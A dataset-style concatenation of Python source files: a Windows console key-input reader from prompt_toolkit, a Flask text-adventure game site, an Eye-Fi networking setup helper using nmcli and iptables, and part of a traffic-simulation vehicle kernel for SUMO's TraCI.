return attach_win32_input(self, input_ready_callback)
def detach(self):
"""
Return a context manager that makes sure that this input is not active
in the current event loop.
"""
return detach_win32_input(self)
def read_keys(self):
return list(self.console_input_reader.read())
def flush(self):
pass
@property
def closed(self):
return False
def raw_mode(self):
return raw_mode()
def cooked_mode(self):
return cooked_mode()
def fileno(self):
# The windows console doesn't depend on the file handle, so
# this is not used for the event loop (which uses the
# handle instead). But it's used in `Application.run_system_command`
# which opens a subprocess with a given stdin/stdout.
return sys.stdin.fileno()
def typeahead_hash(self):
return 'win32-input'
def close(self):
self.console_input_reader.close()
@property
def handle(self):
return self.console_input_reader.handle
class ConsoleInputReader(object):
"""
:param recognize_paste: When True, try to discover paste actions and turn
the event into a BracketedPaste.
"""
# Keys with character data.
mappings = {
b'\x1b': Keys.Escape,
b'\x00': Keys.ControlSpace, # Control-Space (Also for Ctrl-@)
b'\x01': Keys.ControlA, # Control-A (home)
b'\x02': Keys.ControlB, # Control-B (emacs cursor left)
b'\x03': Keys.ControlC, # Control-C (interrupt)
b'\x04': Keys.ControlD, # Control-D (exit)
b'\x05': Keys.ControlE, # Control-E (end)
b'\x06': Keys.ControlF, # Control-F (cursor forward)
b'\x07': Keys.ControlG, # Control-G
b'\x08': Keys.ControlH, # Control-H (8) (Identical to '\b')
b'\x09': Keys.ControlI, # Control-I (9) (Identical to '\t')
b'\x0a': Keys.ControlJ, # Control-J (10) (Identical to '\n')
b'\x0b': Keys.ControlK, # Control-K (delete until end of line; vertical tab)
b'\x0c': Keys.ControlL, # Control-L (clear; form feed)
b'\x0d': Keys.ControlM, # Control-M (enter)
b'\x0e': Keys.ControlN, # Control-N (14) (history forward)
b'\x0f': Keys.ControlO, # Control-O (15)
b'\x10': Keys.ControlP, # Control-P (16) (history back)
b'\x11': Keys.ControlQ, # Control-Q
b'\x12': Keys.ControlR, # Control-R (18) (reverse search)
b'\x13': Keys.ControlS, # Control-S (19) (forward search)
b'\x14': Keys.ControlT, # Control-T
b'\x15': Keys.ControlU, # Control-U
b'\x16': Keys.ControlV, # Control-V
b'\x17': Keys.ControlW, # Control-W
b'\x18': Keys.ControlX, # Control-X
b'\x19': Keys.ControlY, # Control-Y (25)
b'\x1a': Keys.ControlZ, # Control-Z
b'\x1c': Keys.ControlBackslash, # Both Control-\ and Ctrl-|
b'\x1d': Keys.ControlSquareClose, # Control-]
b'\x1e': Keys.ControlCircumflex, # Control-^
b'\x1f': Keys.ControlUnderscore, # Control-underscore (Also for Ctrl-hyphen.)
b'\x7f': Keys.Backspace, # (127) Backspace (ASCII Delete.)
}
# Keys that don't carry character data.
keycodes = {
# Home/End
33: Keys.PageUp,
34: Keys.PageDown,
35: Keys.End,
36: Keys.Home,
# Arrows
37: Keys.Left,
38: Keys.Up,
39: Keys.Right,
40: Keys.Down,
45: Keys.Insert,
46: Keys.Delete,
# F-keys.
112: Keys.F1,
113: Keys.F2,
114: Keys.F3,
115: Keys.F4,
116: Keys.F5,
117: Keys.F6,
118: Keys.F7,
119: Keys.F8,
120: Keys.F9,
121: Keys.F10,
122: Keys.F11,
123: Keys.F12,
}
LEFT_ALT_PRESSED = 0x0002
RIGHT_ALT_PRESSED = 0x0001
SHIFT_PRESSED = 0x0010
LEFT_CTRL_PRESSED = 0x0008
RIGHT_CTRL_PRESSED = 0x0004
def __init__(self, recognize_paste=True):
self._fdcon = None
self.recognize_paste = recognize_paste
# When stdin is a tty, use that handle, otherwise, create a handle from
# CONIN$.
if sys.stdin.isatty():
self.handle = windll.kernel32.GetStdHandle(STD_INPUT_HANDLE)
else:
self._fdcon = os.open('CONIN$', os.O_RDWR | os.O_BINARY)
self.handle = msvcrt.get_osfhandle(self._fdcon)
def close(self):
" Close fdcon. "
if self._fdcon is not None:
os.close(self._fdcon)
def read(self):
"""
Return a list of `KeyPress` instances. It won't return anything when
there was nothing to read. (This function doesn't block.)
http://msdn.microsoft.com/en-us/library/windows/desktop/ms684961(v=vs.85).aspx
"""
max_count = 2048 # Max events to read at the same time.
read = DWORD(0)
arrtype = INPUT_RECORD * max_count
input_records = arrtype()
# Check whether there is some input to read. `ReadConsoleInputW` would
# block otherwise.
# (Actually, the event loop is responsible to make sure that this
# function is only called when there is something to read, but for some
# reason this happened in the asyncio_win32 loop, and it's better to be
# safe anyway.)
if not wait_for_handles([self.handle], timeout=0):
return
# Get next batch of input event.
windll.kernel32.ReadConsoleInputW(
self.handle, pointer(input_records), max_count, pointer(read))
# First, get all the keys from the input buffer, in order to determine
# whether we should consider this a paste event or not.
all_keys = list(self._get_keys(read, input_records))
# Fill in 'data' for key presses.
all_keys = [self._insert_key_data(key) for key in all_keys]
if self.recognize_paste and self._is_paste(all_keys):
gen = iter(all_keys)
for k in gen:
# Pasting: if the current key consists of text or \n, turn it
# into a BracketedPaste.
data = []
while k and (isinstance(k.key, six.text_type) or
k.key == Keys.ControlJ):
data.append(k.data)
try:
k = next(gen)
except StopIteration:
k = None
if data:
yield KeyPress(Keys.BracketedPaste, ''.join(data))
if k is not None:
yield k
else:
for k in all_keys:
yield k
def _insert_key_data(self, key_press):
"""
Insert KeyPress data, for vt100 compatibility.
"""
if key_press.data:
return key_press
data = REVERSE_ANSI_SEQUENCES.get(key_press.key, '')
return KeyPress(key_press.key, data)
def _get_keys(self, read, input_records):
"""
Generator that yields `KeyPress` objects from the input records.
"""
for i in range(read.value):
ir = input_records[i]
# Get the right EventType from the EVENT_RECORD.
# (For some reason the Windows console application 'cmder'
# [http://gooseberrycreative.com/cmder/] can return '0' for
# ir.EventType. -- Just ignore that.)
if ir.EventType in EventTypes:
ev = getattr(ir.Event, EventTypes[ir.EventType])
# Process if this is a key event. (We also have mouse, menu and
# focus events.)
if type(ev) == KEY_EVENT_RECORD and ev.KeyDown:
for key_press in self._event_to_key_presses(ev):
yield key_press
elif type(ev) == MOUSE_EVENT_RECORD:
for key_press in self._handle_mouse(ev):
yield key_press
@staticmethod
def _is_paste(keys):
"""
Return `True` when we should consider this list of keys as a paste
event. Pasted text on windows will be turned into a
`Keys.BracketedPaste` event. (It's not 100% correct, but it is probably
the best possible way to detect pasting of text and handle that
correctly.)
"""
# Consider paste when it contains at least one newline and at least one
# other character.
text_count = 0
newline_count = 0
for k in keys:
if isinstance(k.key, six.text_type):
text_count += 1
if k.key == Keys.ControlM:
newline_count += 1
return newline_count >= 1 and text_count > 1
def _event_to_key_presses(self, ev):
"""
For this `KEY_EVENT_RECORD`, return a list of `KeyPress` instances.
"""
assert type(ev) == KEY_EVENT_RECORD and ev.KeyDown
result = None
u_char = ev.uChar.UnicodeChar
ascii_char = u_char.encode('utf-8')
# NOTE: We don't use `ev.uChar.AsciiChar`. That appears to be latin-1
# encoded. See also:
# https://github.com/ipython/ipython/issues/10004
# https://github.com/jonathanslenders/python-prompt-toolkit/issues/389
if u_char == '\x00':
if ev.VirtualKeyCode in self.keycodes:
result = KeyPress(self.keycodes[ev.VirtualKeyCode], '')
else:
if ascii_char in self.mappings:
if self.mappings[ascii_char] == Keys.ControlJ:
                    u_char = '\n'  # normalize enter to '\n' for unix compatibility.
result = KeyPress(self.mappings[ascii_char], u_char)
else:
result = KeyPress(u_char, u_char)
# Correctly handle Control-Arrow keys.
if (ev.ControlKeyState & self.LEFT_CTRL_PRESSED or
ev.ControlKeyState & self.RIGHT_CTRL_PRESSED) and result:
if result.key == Keys.Left:
result.key = Keys.ControlLeft
if result.key == Keys.Right:
result.key = Keys.ControlRight
if result.key == Keys.Up:
result.key = Keys.ControlUp
if result.key == Keys.Down:
result.key = Keys.ControlDown
# Turn 'Tab' into 'BackTab' when shift was pressed.
if ev.ControlKeyState & self.SHIFT_PRESSED and result:
if result.key == Keys.Tab:
result.key = Keys.BackTab
# Turn 'Space' into 'ControlSpace' when control was pressed.
if (ev.ControlKeyState & self.LEFT_CTRL_PRESSED or
ev.ControlKeyState & self.RIGHT_CTRL_PRESSED) and result and result.data == ' ':
result = KeyPress(Keys.ControlSpace, ' ')
# Turn Control-Enter into META-Enter. (On a vt100 terminal, we cannot
# detect this combination. But it's really practical on Windows.)
if (ev.ControlKeyState & self.LEFT_CTRL_PRESSED or
ev.ControlKeyState & self.RIGHT_CTRL_PRESSED) and result and \
result.key == Keys.ControlJ:
return [KeyPress(Keys.Escape, ''), result]
# Return result. If alt was pressed, prefix the result with an
# 'Escape' key, just like unix VT100 terminals do.
# NOTE: Only replace the left alt with escape. The right alt key often
# acts as altgr and is used in many non US keyboard layouts for
# typing some special characters, like a backslash. We don't want
# all backslashes to be prefixed with escape. (Esc-\ has a
        # meaning in Emacs, for instance.)
if result:
meta_pressed = ev.ControlKeyState & self.LEFT_ALT_PRESSED
if meta_pressed:
return [KeyPress(Keys.Escape, ''), result]
else:
return [result]
else:
return []
def _handle_mouse(self, ev):
"""
Handle mouse events. Return a list of KeyPress instances.
"""
FROM_LEFT_1ST_BUTTON_PRESSED = 0x1
result = []
# Check event type.
if ev.ButtonState == FROM_LEFT_1ST_BUTTON_PRESSED:
# On a key press, generate both the mouse down and up event.
for event_type in [MouseEventType.MOUSE_DOWN, MouseEventType.MOUSE_UP]:
data = ';'.join([
event_type,
str(ev.MousePosition.X),
str(ev.MousePosition.Y)
])
result.append(KeyPress(Keys.WindowsMouseEvent, data))
return result
_current_callbacks = {} # loop -> callback
@contextmanager
def attach_win32_input(input, callback):
"""
Context manager that makes this input active in the current event loop.
:param input: :class:`~prompt_toolkit.input.Input` object.
:param input_ready_callback: Called when the input is ready to read.
"""
assert isinstance(input, Input)
assert callable(callback)
loop = get_event_loop()
previous_callback = _current_callbacks.get(loop)
# Add reader.
loop.add_win32_handle(input.handle, callback)
_current_callbacks[loop] = callback
try:
yield
finally:
loop.remove_win32_handle(input.handle)
if previous_callback:
loop.add_win32_handle(input.handle, previous_callback)
_current_callbacks[loop] = previous_callback
else:
del _current_callbacks[loop]
@contextmanager
def detach_win32_input(input):
assert isinstance(input, Input)
loop = get_event_loop()
previous = _current_callbacks.get(loop)
if previous:
loop.remove_win32_handle(input.handle)
_current_callbacks[loop] = None
try:
yield
finally:
if previous:
loop.add_win32_handle(input.handle, previous)
_current_callbacks[loop] = previous
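
# Usage sketch (hedged: `process` is a hypothetical handler, and a
# prompt_toolkit event loop must be running for the callback to fire):
#
#     inp = Win32Input()
#
#     def on_input_ready():
#         for key_press in inp.read_keys():
#             process(key_press)
#
#     with attach_win32_input(inp, on_input_ready):
#         ...  # run the event loop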
class raw_mode(object):
"""
::
with raw_mode(stdin):
''' the windows terminal is now in 'raw' mode. '''
The ``fileno`` attribute is ignored. This is to be compatible with the
`raw_input` method of `.vt100_input`.
"""
def __init__(self, fileno=None):
self.handle = windll.kernel32.GetStdHandle(STD_INPUT_HANDLE)
def __enter__(self):
# Remember original mode.
original_mode = DWORD()
windll.kernel32.GetConsoleMode(self.handle, pointer(original_mode))
self.original_mode = original_mode
self._patch()
def _patch(self):
# Set raw
ENABLE_ECHO_INPUT = 0x0004
ENABLE_LINE_INPUT = 0x0002
ENABLE_PROCESSED_INPUT = 0x0001
windll.kernel32.SetConsoleMode(
self.handle, self.original_mode.value &
~(ENABLE_ECHO_INPUT | ENABLE_LINE_INPUT | ENABLE_PROCESSED_INPUT))
def __exit__(self, *a, **kw):
# Restore original mode
windll.kernel32.SetConsoleMode(self.handle, self.original_mode)
class cooked_mode(raw_mode):
"""
::
with cooked_mode(stdin):
''' The pseudo-terminal stdin is now used in cooked mode. '''
"""
def _patch(self):
# Set cooked.
ENABLE_ECHO_INPUT = 0x0004
ENABLE_LINE_INPUT = 0x0002
ENABLE_PROCESSED_INPUT = 0x0001
windll.kernel32.SetConsoleMode(
self.handle, self.original_mode.value |
(ENABLE_ECHO_INPUT | ENABLE_LINE_INPUT | ENABLE_PROCESSED_INPUT))
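
# Minimal polling sketch (hedged; Windows console only):
#
#     with raw_mode():
#         reader = ConsoleInputReader()
#         keys = list(reader.read())  # non-blocking; may return nothing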
| mit | -7,604,924,395,875,958,000 | 32.658 | 119 | 0.583457 | false | 3.801446 | false | false | false |
becdot/adventures-in-text | game_site.py | 1 | 2155 | # FLASK WEBSITE
# Runs the game online (currently only on localhost:5000)
# Renders html, passes user_action to game.play(action), and calls database methods to get, save, and delete games
from game import Game
from db_methods import SECRET_KEY, DATABASE, COLLECTION, DEBUG, app, g, \
connect_db, init_db, save_game, get_game, new_game
from flask import Flask, render_template, request, session, redirect, url_for
@app.before_request
def before_request():
g.connection = connect_db()
g.db = g.connection[DATABASE][COLLECTION]
@app.teardown_request
def teardown_request(exception):
g.connection.close()
def get_new_game(user_id=None):
blank_game = Game()
if user_id:
print "deleting user", user_id
session['id'] = new_game(blank_game, user_id)
print "creating a new game for user", session['id']
return redirect(url_for('index'))
@app.route('/', methods=['GET', 'POST'])
def index():
if request.method == 'GET':
if 'id' in session and get_game(session['id']):
loaded_game = get_game(session['id'])
print "session", session['id'], "is already initialized"
return render_template('form.html', room=loaded_game.game['location'],
inventory=loaded_game.game['inv'], exits=loaded_game.game['location'].exits)
else:
if 'id' in session:
return get_new_game(session['id'])
return get_new_game()
elif request.method == 'POST':
action = request.form['action']
if 'id' not in session:
return redirect(url_for('index'))
loaded = get_game(session['id'])
msg = loaded.play(action)
save_game(session['id'], loaded)
print "saving game for user", session['id']
return render_template('form.html', room=loaded.game['location'], inventory=loaded.game['inv'], \
exits=loaded.game['location'].exits, message=msg)
@app.route('/newgame', methods=['GET'])
def newgame():
return get_new_game(session['id'])
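
# Quick manual test (hypothetical: assumes MongoDB is reachable for
# db_methods and the server was started with `python game_site.py`):
#
#     $ curl -c cookies -b cookies http://localhost:5000/
#     $ curl -c cookies -b cookies -d "action=look" http://localhost:5000/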
if __name__ == '__main__':
app.run(host='localhost') | mit | -2,956,342,439,897,804,300 | 36.172414 | 114 | 0.612065 | false | 3.728374 | false | false | false |
hgdeoro/EFLU | eyefilinuxui/networking_setup.py | 1 | 3424 | # coding=utf-8
#----------------------------------------------------------------------
# Copyright (c) 2013 Horacio G. de Oro <[email protected]>
#----------------------------------------------------------------------
# This file is part of EFLU.
#
# EFLU is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# EFLU is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EFLU. If not, see <http://www.gnu.org/licenses/>.
#----------------------------------------------------------------------
import logging
import subprocess
from eyefilinuxui.util import kdesudo
logger = logging.getLogger(__name__)
def nm_interface_exists(interface):
"""Returns True if interface exists"""
# $ nmcli -t -f DEVICE dev
# wlan0
# eth0
output = subprocess.check_output(["nmcli", "-t", "-f", "DEVICE", "dev"])
logger.debug("OUTPUT: %s", output)
return interface in [l.strip() for l in output.strip().splitlines() if l.strip()]
def nm_check_disconnected(interface):
"""Returns True if interface is disconnected"""
# $ nmcli -t -f DEVICE,STATE dev
# wlan0:disconnected
# eth0:connected
output = subprocess.check_output(["nmcli", "-t", "-f", "DEVICE,STATE", "dev"])
for line in [l.strip() for l in output.strip().splitlines() if l.strip()]:
dev, state = line.split(':')
if dev == interface:
if state == 'disconnected':
logger.info("GOOD! Device %s is disconnected.", interface)
return True
else:
logger.warn("Device %s isn't disconnected - Device state: %s", interface, state)
return False
logger.warn("nmcli doesn't returned info for interface %s", interface)
return False
def nm_try_disconnect(interface):
return subprocess.call(["nmcli", "dev", "disconnect", "iface", interface])
def ifconfig(interface, ip):
return kdesudo(["ifconfig", interface, "{0}/24".format(ip)])
def iptables(interface, ip):
# FIXME: put comments and check it to not repeat the setup of firewall every time the app starts
iptables_rules = subprocess.check_output(["kdesudo", "--", "iptables", "-n", "-v", "-L", "INPUT"])
logger.debug("iptables_rules: %s", iptables_rules)
if iptables_rules.find("/* EyeFiServerUi/1 */") == -1:
kdesudo(["iptables", "-I", "INPUT", "-i", interface,
"-p", "icmp", "-d", ip, "-m", "comment", "--comment", "EyeFiServerUi/1", "-j", "ACCEPT"])
if iptables_rules.find("/* EyeFiServerUi/2 */") == -1:
kdesudo(["iptables", "-I", "INPUT", "-i", interface,
"-p", "tcp", "-d", ip, "-m", "comment", "--comment", "EyeFiServerUi/2",
"--dport", "59278", "-j", "ACCEPT"])
if iptables_rules.find("/* EyeFiServerUi/3 */") == -1:
kdesudo(["iptables", "-I", "INPUT", "-i", interface,
"-p", "udp", "-d", ip, "-m", "comment", "--comment", "EyeFiServerUi/3",
"--dport", "67:68", "-j", "ACCEPT"])
| gpl-3.0 | -7,873,829,662,059,535,000 | 41.271605 | 102 | 0.575643 | false | 3.733915 | false | false | false |
cathywu/flow | flow/core/kernel/vehicle/traci.py | 1 | 40571 | """Script containing the TraCI vehicle kernel class."""
import traceback
from flow.core.kernel.vehicle import KernelVehicle
import traci.constants as tc
from traci.exceptions import FatalTraCIError, TraCIException
import numpy as np
import collections
import warnings
from flow.controllers.car_following_models import SimCarFollowingController
from flow.controllers.rlcontroller import RLController
from flow.controllers.lane_change_controllers import SimLaneChangeController
from bisect import bisect_left
import itertools
from copy import deepcopy
# colors for vehicles
WHITE = (255, 255, 255)
CYAN = (0, 255, 255)
RED = (255, 0, 0)
class TraCIVehicle(KernelVehicle):
"""Flow kernel for the TraCI API.
Extends flow.core.kernel.vehicle.base.KernelVehicle
"""
def __init__(self,
master_kernel,
sim_params):
"""See parent class."""
KernelVehicle.__init__(self, master_kernel, sim_params)
self.__ids = [] # ids of all vehicles
self.__human_ids = [] # ids of human-driven vehicles
self.__controlled_ids = [] # ids of flow-controlled vehicles
self.__controlled_lc_ids = [] # ids of flow lc-controlled vehicles
self.__rl_ids = [] # ids of rl-controlled vehicles
self.__observed_ids = [] # ids of the observed vehicles
# vehicles: Key = Vehicle ID, Value = Dictionary describing the vehicle
# Ordered dictionary used to keep neural net inputs in order
self.__vehicles = collections.OrderedDict()
# create a sumo_observations variable that will carry all information
# on the state of the vehicles for a given time step
self.__sumo_obs = {}
# total number of vehicles in the network
self.num_vehicles = 0
# number of rl vehicles in the network
self.num_rl_vehicles = 0
# contains the parameters associated with each type of vehicle
self.type_parameters = {}
# contain the minGap attribute of each type of vehicle
self.minGap = {}
# list of vehicle ids located in each edge in the network
self._ids_by_edge = dict()
# number of vehicles that entered the network for every time-step
self._num_departed = []
self._departed_ids = []
# number of vehicles to exit the network for every time-step
self._num_arrived = []
self._arrived_ids = []
# whether or not to automatically color vehicles
try:
self._color_vehicles = sim_params.color_vehicles
except AttributeError:
self._color_vehicles = False
def initialize(self, vehicles):
"""Initialize vehicle state information.
This is responsible for collecting vehicle type information from the
VehicleParams object and placing them within the Vehicles kernel.
Parameters
----------
vehicles : flow.core.params.VehicleParams
initial vehicle parameter information, including the types of
individual vehicles and their initial speeds
"""
self.type_parameters = vehicles.type_parameters
self.minGap = vehicles.minGap
self.num_vehicles = 0
self.num_rl_vehicles = 0
self.__vehicles.clear()
for typ in vehicles.initial:
for i in range(typ['num_vehicles']):
veh_id = '{}_{}'.format(typ['veh_id'], i)
self.__vehicles[veh_id] = dict()
self.__vehicles[veh_id]['type'] = typ['veh_id']
self.__vehicles[veh_id]['initial_speed'] = typ['initial_speed']
self.num_vehicles += 1
if typ['acceleration_controller'][0] == RLController:
self.num_rl_vehicles += 1
def update(self, reset):
"""See parent class.
The following actions are performed:
* The state of all vehicles is modified to match their state at the
current time step. This includes states specified by sumo, and states
explicitly defined by flow, e.g. "num_arrived".
* If vehicles exit the network, they are removed from the vehicles
class, and newly departed vehicles are introduced to the class.
Parameters
----------
reset : bool
specifies whether the simulator was reset in the last simulation
step
"""
vehicle_obs = {}
for veh_id in self.__ids:
vehicle_obs[veh_id] = \
self.kernel_api.vehicle.getSubscriptionResults(veh_id)
sim_obs = self.kernel_api.simulation.getSubscriptionResults()
# remove exiting vehicles from the vehicles class
for veh_id in sim_obs[tc.VAR_ARRIVED_VEHICLES_IDS]:
if veh_id not in sim_obs[tc.VAR_TELEPORT_STARTING_VEHICLES_IDS]:
self.remove(veh_id)
# remove exiting vehicles from the vehicle subscription if they
# haven't been removed already
if vehicle_obs[veh_id] is None:
vehicle_obs.pop(veh_id, None)
else:
# this is meant to resolve the KeyError bug when there are
# collisions
vehicle_obs[veh_id] = self.__sumo_obs[veh_id]
# add entering vehicles into the vehicles class
for veh_id in sim_obs[tc.VAR_DEPARTED_VEHICLES_IDS]:
veh_type = self.kernel_api.vehicle.getTypeID(veh_id)
if veh_id in self.get_ids():
# this occurs when a vehicle is actively being removed and
# placed again in the network to ensure a constant number of
# total vehicles (e.g. GreenWaveEnv). In this case, the vehicle
# is already in the class; its state data just needs to be
# updated
pass
else:
obs = self._add_departed(veh_id, veh_type)
# add the subscription information of the new vehicle
vehicle_obs[veh_id] = obs
if reset:
self.time_counter = 0
# reset all necessary values
self.prev_last_lc = dict()
for veh_id in self.__rl_ids:
self.__vehicles[veh_id]["last_lc"] = -float("inf")
self.prev_last_lc[veh_id] = -float("inf")
self._num_departed.clear()
self._num_arrived.clear()
self._departed_ids.clear()
self._arrived_ids.clear()
# add vehicles from a network template, if applicable
if hasattr(self.master_kernel.scenario.network,
"template_vehicles"):
for veh_id in self.master_kernel.scenario.network.\
template_vehicles:
vals = deepcopy(self.master_kernel.scenario.network.
template_vehicles[veh_id])
# a step is executed during initialization, so add this sim
# step to the departure time of vehicles
vals['depart'] = str(
float(vals['depart']) + 2 * self.sim_step)
self.kernel_api.vehicle.addFull(
veh_id, 'route{}_0'.format(veh_id), **vals)
else:
self.time_counter += 1
# update the "last_lc" variable
for veh_id in self.__rl_ids:
prev_lane = self.get_lane(veh_id)
if vehicle_obs[veh_id][tc.VAR_LANE_INDEX] != prev_lane:
self.__vehicles[veh_id]["last_lc"] = self.time_counter
# updated the list of departed and arrived vehicles
self._num_departed.append(
len(sim_obs[tc.VAR_DEPARTED_VEHICLES_IDS]))
self._num_arrived.append(len(sim_obs[tc.VAR_ARRIVED_VEHICLES_IDS]))
            self._departed_ids.append(sim_obs[tc.VAR_DEPARTED_VEHICLES_IDS])
self._arrived_ids.append(sim_obs[tc.VAR_ARRIVED_VEHICLES_IDS])
# update the "headway", "leader", and "follower" variables
for veh_id in self.__ids:
try:
_position = vehicle_obs.get(veh_id, {}).get(
tc.VAR_POSITION, -1001)
_angle = vehicle_obs.get(veh_id, {}).get(tc.VAR_ANGLE, -1001)
_time_step = sim_obs[tc.VAR_TIME_STEP]
_time_delta = sim_obs[tc.VAR_DELTA_T]
self.__vehicles[veh_id]["orientation"] = \
list(_position) + [_angle]
self.__vehicles[veh_id]["timestep"] = _time_step
self.__vehicles[veh_id]["timedelta"] = _time_delta
except TypeError:
print(traceback.format_exc())
headway = vehicle_obs.get(veh_id, {}).get(tc.VAR_LEADER, None)
# check for a collided vehicle or a vehicle with no leader
if headway is None:
self.__vehicles[veh_id]["leader"] = None
self.__vehicles[veh_id]["follower"] = None
self.__vehicles[veh_id]["headway"] = 1e+3
else:
min_gap = self.minGap[self.get_type(veh_id)]
self.__vehicles[veh_id]["headway"] = headway[1] + min_gap
self.__vehicles[veh_id]["leader"] = headway[0]
try:
self.__vehicles[headway[0]]["follower"] = veh_id
except KeyError:
print(traceback.format_exc())
# update the sumo observations variable
self.__sumo_obs = vehicle_obs.copy()
# update the lane leaders data for each vehicle
self._multi_lane_headways()
# make sure the rl vehicle list is still sorted
self.__rl_ids.sort()
def _add_departed(self, veh_id, veh_type):
"""Add a vehicle that entered the network from an inflow or reset.
Parameters
----------
veh_id: str
name of the vehicle
veh_type: str
type of vehicle, as specified to sumo
Returns
-------
dict
subscription results from the new vehicle
"""
if veh_type not in self.type_parameters:
raise KeyError("Entering vehicle is not a valid type.")
self.__ids.append(veh_id)
if veh_id not in self.__vehicles:
self.num_vehicles += 1
self.__vehicles[veh_id] = dict()
# specify the type
self.__vehicles[veh_id]["type"] = veh_type
car_following_params = \
self.type_parameters[veh_type]["car_following_params"]
# specify the acceleration controller class
accel_controller = \
self.type_parameters[veh_type]["acceleration_controller"]
self.__vehicles[veh_id]["acc_controller"] = \
accel_controller[0](veh_id,
car_following_params=car_following_params,
**accel_controller[1])
# specify the lane-changing controller class
lc_controller = \
self.type_parameters[veh_type]["lane_change_controller"]
self.__vehicles[veh_id]["lane_changer"] = \
lc_controller[0](veh_id=veh_id, **lc_controller[1])
# specify the routing controller class
rt_controller = self.type_parameters[veh_type]["routing_controller"]
if rt_controller is not None:
self.__vehicles[veh_id]["router"] = \
rt_controller[0](veh_id=veh_id, router_params=rt_controller[1])
else:
self.__vehicles[veh_id]["router"] = None
# add the vehicle's id to the list of vehicle ids
if accel_controller[0] == RLController:
self.__rl_ids.append(veh_id)
self.num_rl_vehicles += 1
else:
self.__human_ids.append(veh_id)
if accel_controller[0] != SimCarFollowingController:
self.__controlled_ids.append(veh_id)
if lc_controller[0] != SimLaneChangeController:
self.__controlled_lc_ids.append(veh_id)
# subscribe the new vehicle
self.kernel_api.vehicle.subscribe(veh_id, [
tc.VAR_LANE_INDEX, tc.VAR_LANEPOSITION, tc.VAR_ROAD_ID,
tc.VAR_SPEED, tc.VAR_EDGES, tc.VAR_POSITION, tc.VAR_ANGLE,
tc.VAR_SPEED_WITHOUT_TRACI
])
self.kernel_api.vehicle.subscribeLeader(veh_id, 2000)
# some constant vehicle parameters to the vehicles class
self.__vehicles[veh_id]["length"] = self.kernel_api.vehicle.getLength(
veh_id)
# set the "last_lc" parameter of the vehicle
self.__vehicles[veh_id]["last_lc"] = -float("inf")
# specify the initial speed
self.__vehicles[veh_id]["initial_speed"] = \
self.type_parameters[veh_type]["initial_speed"]
# set the speed mode for the vehicle
speed_mode = self.type_parameters[veh_type][
"car_following_params"].speed_mode
self.kernel_api.vehicle.setSpeedMode(veh_id, speed_mode)
# set the lane changing mode for the vehicle
lc_mode = self.type_parameters[veh_type][
"lane_change_params"].lane_change_mode
self.kernel_api.vehicle.setLaneChangeMode(veh_id, lc_mode)
# get initial state info
self.__sumo_obs[veh_id] = dict()
self.__sumo_obs[veh_id][tc.VAR_ROAD_ID] = \
self.kernel_api.vehicle.getRoadID(veh_id)
self.__sumo_obs[veh_id][tc.VAR_LANEPOSITION] = \
self.kernel_api.vehicle.getLanePosition(veh_id)
self.__sumo_obs[veh_id][tc.VAR_LANE_INDEX] = \
self.kernel_api.vehicle.getLaneIndex(veh_id)
self.__sumo_obs[veh_id][tc.VAR_SPEED] = \
self.kernel_api.vehicle.getSpeed(veh_id)
# make sure that the order of rl_ids is kept sorted
self.__rl_ids.sort()
# get the subscription results from the new vehicle
new_obs = self.kernel_api.vehicle.getSubscriptionResults(veh_id)
return new_obs
def remove(self, veh_id):
"""See parent class."""
# remove from sumo
if veh_id in self.kernel_api.vehicle.getIDList():
self.kernel_api.vehicle.unsubscribe(veh_id)
self.kernel_api.vehicle.remove(veh_id)
try:
# remove from the vehicles kernel
del self.__vehicles[veh_id]
del self.__sumo_obs[veh_id]
self.__ids.remove(veh_id)
# remove it from all other ids (if it is there)
if veh_id in self.__human_ids:
self.__human_ids.remove(veh_id)
if veh_id in self.__controlled_ids:
self.__controlled_ids.remove(veh_id)
if veh_id in self.__controlled_lc_ids:
self.__controlled_lc_ids.remove(veh_id)
else:
self.__rl_ids.remove(veh_id)
# make sure that the rl ids remain sorted
self.__rl_ids.sort()
except KeyError:
pass
# modify the number of vehicles and RL vehicles
self.num_vehicles = len(self.get_ids())
self.num_rl_vehicles = len(self.get_rl_ids())
def test_set_speed(self, veh_id, speed):
"""Set the speed of the specified vehicle."""
self.__sumo_obs[veh_id][tc.VAR_SPEED] = speed
def test_set_edge(self, veh_id, edge):
"""Set the speed of the specified vehicle."""
self.__sumo_obs[veh_id][tc.VAR_ROAD_ID] = edge
def set_follower(self, veh_id, follower):
"""Set the follower of the specified vehicle."""
self.__vehicles[veh_id]["follower"] = follower
def set_headway(self, veh_id, headway):
"""Set the headway of the specified vehicle."""
self.__vehicles[veh_id]["headway"] = headway
def get_orientation(self, veh_id):
"""See parent class."""
return self.__vehicles[veh_id]["orientation"]
def get_timestep(self, veh_id):
"""See parent class."""
return self.__vehicles[veh_id]["timestep"]
def get_timedelta(self, veh_id):
"""See parent class."""
return self.__vehicles[veh_id]["timedelta"]
def get_type(self, veh_id):
"""Return the type of the vehicle of veh_id."""
return self.__vehicles[veh_id]["type"]
def get_initial_speed(self, veh_id):
"""Return the initial speed of the vehicle of veh_id."""
return self.__vehicles[veh_id]["initial_speed"]
def get_ids(self):
"""See parent class."""
return self.__ids
def get_human_ids(self):
"""See parent class."""
return self.__human_ids
def get_controlled_ids(self):
"""See parent class."""
return self.__controlled_ids
def get_controlled_lc_ids(self):
"""See parent class."""
return self.__controlled_lc_ids
def get_rl_ids(self):
"""See parent class."""
return self.__rl_ids
def set_observed(self, veh_id):
"""See parent class."""
if veh_id not in self.__observed_ids:
self.__observed_ids.append(veh_id)
def remove_observed(self, veh_id):
"""See parent class."""
if veh_id in self.__observed_ids:
self.__observed_ids.remove(veh_id)
def get_observed_ids(self):
"""See parent class."""
return self.__observed_ids
def get_ids_by_edge(self, edges):
"""See parent class."""
if isinstance(edges, (list, np.ndarray)):
return sum([self.get_ids_by_edge(edge) for edge in edges], [])
return self._ids_by_edge.get(edges, []) or []
def get_inflow_rate(self, time_span):
"""See parent class."""
if len(self._num_departed) == 0:
return 0
num_inflow = self._num_departed[-int(time_span / self.sim_step):]
return 3600 * sum(num_inflow) / (len(num_inflow) * self.sim_step)
def get_outflow_rate(self, time_span):
"""See parent class."""
if len(self._num_arrived) == 0:
return 0
num_outflow = self._num_arrived[-int(time_span / self.sim_step):]
return 3600 * sum(num_outflow) / (len(num_outflow) * self.sim_step)
